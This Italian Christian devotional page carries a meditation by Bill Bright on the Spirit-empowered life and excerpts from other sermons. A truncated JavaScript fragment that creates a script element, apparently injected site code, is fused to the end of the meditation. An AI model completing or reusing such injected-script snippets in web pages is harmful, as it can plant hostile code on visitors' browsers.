Meditazione del giorno: Una grande avventura

bill-brightdi BILL BRIGHT  (Fondatore di Campus Crusade for Christ International)  –   La vita cristiana è una grande avventura. E una vita che ha un fine ed una forza. Cristo ha fatto la promessa più incredibile che si possa pensare: «Chi crede in me farà anch’egli le opere che faccio io; e ne farà di maggiori, perché io me ne vado dal Padre; e quel che chiederete nel mio nome, lo farò…».  Ovviamente, con le nostre forze non possiamo compiere queste grandi opere che, secondo la Sua promessa, possiamo fare. Soltanto Cristo che vive in noi in tutta la potenza della sua resurrezione, che cammina col nostro corpo, pensa con la no­stra mente, ama col nostro cuore, parla con le nostre labbra, ci darà la potenza dello Spirito Santo per compiere

queste grandi opere. Non sarà la nostra sapienza, né la nostra eloquenza, né la nostra logica, né la nostra buona natura, né la nostra forza di persuasione, che ci faranno condurre gli uomini al Salvatore.

II Figliuolo dell’uomo venne personal mente per cercare e salvare i perduti. Gesù infatti disse: «Venite dietro a me, e vi farò pescatori d’uomini». E’ compito no­stro seguirLo ed e compito Suo farci pe­scatori d’uomini. I cristiani del primo secolo, guidati e rivestiti di potenza dallo Spirito Santo, ripieni dell’amore di Cristo, misero sottosopra il mondo.

Ripieni dello Spirito Santo, i discepoli ricevettero una potenza divina e soprannaturale che trasformò uomini timorosi in testimoni radiosi del Cristo. Iddio si servi di essi per cambiare il corso della storia. E quella forza onnipotente, che è la po­tenza dello Spirito Santo, e a voi offerta per permettervi di vivere una vita santa e feconda per Gesù Cristo.var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

LE COSE LECITE

di Roberto Bracco  –  Un servo di Dio disse: – “La parte più numerosa di coloro che naufragano nell’oceano della fede è vinta non dall’immoralità, ma dalle cose lecite.” Oggi quest’affermazione sembra una didascalia della situazione della cristianità. Le “cose lecite” sono diventate un’altra volta le catene dei credenti; i loro polsi e le loro caviglie, parliamo in metafora, sono serrati strettamente …
Leggi Tutto

FUI FORESTIERO E MI ACCOGLIESTE  -  Matteo 25:35  

di Roberto Bracco  “Signore, quando ti abbiamo veduto forestiero e ti abbiamo accolto? (vs. 38)   –   La domanda umile e sincera dei giusti ci rivela non soltanto la sorpresa di vedere e udire il Figliuolo dell’uomo sostituire o rappresentare i poveri e i bisognosi beneficati nelle più diverse occasioni e nelle più svariate necessità, ma ci rivela anche la modestia profonda che adorna coloro i quali …
Leggi Tutto

35-Vance_Havner

di Vance Havner  –  Mentre il tuo servo era occupato qua e là, quell’uomo sparì (1 Re 20:40).  L’uomo in questa storia ricevette un incarico da portare avanti, ma si dimostrò infedele, non perché oziò o perché si addormentò, ma perché era troppo occupato. La pigrizia può essere opera del diavolo, ma lo è anche l’essere tanto occupati se ciò fa si che le cose ci sfuggano di mano …
Leggi Tutto

SERMONE PREDICATO DAL PASTORE AGOSTINO MASDEA nella Chiesa A.D.I. di S. Benedetto del Tronto Domenica 24 Maggio 2015 E noi tutti, contemplando a faccia scoperta come in uno specchio la gloria del Signore, siamo trasformati nella stessa immagine di gloria in gloria, come per lo Spirito del Signore. (2 Corinzi 3:18) Di gloria in gloria: vuol dire che se guardiamo a Gesù, più stiamo nella Sua presenza, come nel riflesso …
Leggi Tutto

CASA O TENDA

Sappiamo infatti che se questa tenda che è la nostra dimora terrena viene disfatta, abbiamo da Dio un edificio, una casa non fatta da mano d’uomo, eterna, nei cieli. Perciò in questa tenda gemiamo, desiderando intensamente di essere rivestiti della nostra abitazione celeste, se pure saremo trovati vestiti e non nudi. Poiché noi che siamo in questa tenda, gemiamo, oppressi; e perciò desideriamo non già di essere spogliati, …
Leggi Tutto

FUOCO CONSUMANTE

di – Jim Cymbala    –  Gesù non ha mai battezzato nessuno con acqua. Perché? Perché il battesimo che Lui avrebbe ministrato sarebbe stato il battesimo dello Spirito Santo e col fuoco (leggere Luca 3:16). Non confondete queste parole come a voler indicare due battesimi, uno con lo Spirito e uno col fuoco.  Al contrario, Luca stava usando l’immagine del fuoco come simbolo che rappresenta lo Spirito, per …
Leggi Tutto

Dai nostri Culti